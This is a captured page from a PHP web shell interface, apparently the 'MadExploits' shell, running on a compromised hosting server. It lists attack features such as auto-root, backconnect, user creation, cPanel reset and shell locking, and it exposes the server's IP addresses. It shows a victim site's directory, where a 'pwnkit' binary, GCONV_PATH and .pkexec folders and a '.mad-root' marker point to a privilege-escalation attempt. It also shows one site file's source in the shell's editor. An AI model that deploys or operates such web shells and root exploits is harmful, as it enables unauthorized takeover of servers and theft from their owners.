Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.227.46.87
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
CMS-NEW /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
validations
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.5
KB
-rw-r--r--
add-keyword.php
5.24
KB
-rw-r--r--
assign-service.php
6.59
KB
-rw-r--r--
blank-page.php
486
B
-rw-r--r--
category-excel.php
2.02
KB
-rw-r--r--
category.php
5.59
KB
-rw-r--r--
change-password.php
1.87
KB
-rw-r--r--
dashboard.php
22.39
KB
-rw-r--r--
edit-profile.php
4.68
KB
-rw-r--r--
error_log
5.84
KB
-rw-r--r--
forgot-password.php
2.08
KB
-rw-r--r--
keywords.php
6.24
KB
-rw-r--r--
login.php
4.83
KB
-rw-r--r--
logout.php
194
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register.php
5.98
KB
-rw-r--r--
user-excel.php
2.11
KB
-rw-r--r--
user.php
3.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : category-excel.php
<?php include'include/dbconnect.php'; $setSql = "select * from service_category order by id desc"; $cat=mysqli_query($conn,$setSql); ?> <!DOCTYPE html> <html> <head> <title>Visa User List</title> <meta charset="utf-8" content="text/html"> <script src="//ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script> <script src="//cdn.rawgit.com/rainabba/jquery-table2excel/1.1.0/dist/jquery.table2excel.min.js"></script> </head> <body> <table id="mytable" style="display: none;"> <thead> <tr> <th>Sr No</th> <th>Category Name</th> <th>Status</th> </tr> </thead> <tbody> <?php if(mysqli_num_rows($cat)) { $i='1'; while( $cat1=mysqli_fetch_array($cat)) { echo '<tr id="del'.$cat1['id'].'"> <td>'.$i.'</td> <td>'.$cat1['category_name'].'</td> <td id="'.$cat1['id'].'">'.($cat1['status']=='1'?'<button type="button" class="btn btn-outline-success mb-1 mb-md-0 chng_st" data-id="'.$cat1['id'].'" data-idd="'.$cat1['status'].'" >Acivate</button>':'<button type="button" class="btn btn-outline-danger mb-1 mb-md-0 chng_st" data-id="'.$cat1['id'].'" data-idd="'.$cat1['status'].'" >DeAcivate</button>').'</td> </tr>'; $i++; } } else { echo '<tr> <td>No Data Found.</td> </tr>'; } ?> </tbody> </table> <script type="text/javascript"> $(function(){ $.when($("#mytable").table2excel({ filename: "category_list_<?php echo date('d_m_Y')?>" //do not include extension })).then(function(){ window.close(this); }); }); </script> </body> </html>
Close